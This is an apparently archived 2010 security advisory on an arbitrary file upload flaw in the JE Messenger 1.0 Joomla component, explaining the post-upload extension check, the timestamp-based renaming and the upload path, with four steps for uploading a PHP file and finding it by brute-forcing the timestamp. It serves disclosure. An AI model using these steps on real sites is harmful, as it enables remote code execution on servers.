扫码分享
验证:
体验盒子JE Messenger 1.0 Arbitrary File Upload Vulnerability
NameJE Messenger
Vendorhttp://joomlaextensions.co.in
Versions Affected 1.0
AuthorSalvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date2010-12-09
X. INDEX
I.ABOUT THE APPLICATION
II. DESCRIPTION
III.ANALYSIS
IV. SAMPLE CODE
V.FIX
I. ABOUT THE APPLICATION
________________________
JE Messenger is a Joomla's component.
II. DESCRIPTION
_______________
A parameter is not properly sanitised beforebeing used
from the native Joomla's upload function.
III. ANALYSIS
_____________
Summary:
A) Arbitrary File Upload
A) Arbitrary File Upload
________________________
A logic error in the save function(compose.php)allows
to a registered user to upload a file with any extension.
The check for a valid file's extension is madeafter the
upload and in the failure case, the file doesn'tremoved
from the server. This can be exploitedtoexecute
arbitrary PHP code by uploading a PHP file.
The file's name is different after the upload:
$file['name'] = time().'in'.$file['name'];
Example:
Original file's name: shell.php
Uploaded file's name: 1291907399inshell.php
Where1291907399isthevalue returns from the time()
function.
The file will be uploaded to the following directory:
$dest = JPATH_ROOT.DS.'components/'.$option.'/assets/images/'.$file['name'];
The default destination is:
http://site/path/components/com_jemessenger/assets/images/
IV. SAMPLE CODE
_______________
A) Arbitrary File Upload
1 - Login to target website's Joomla
2 - Go to http://site/path/index.php?option=com_jemessenger&view=compose
3 - Compile a valid form and select an arbitrary file
4 - Go to http://site/path/components/com_jemessenger/assets/images/filename
Try a little bruteforce to find the valuereturnedfrom
the time() function.
V. FIX
______
No fix.
体验盒子
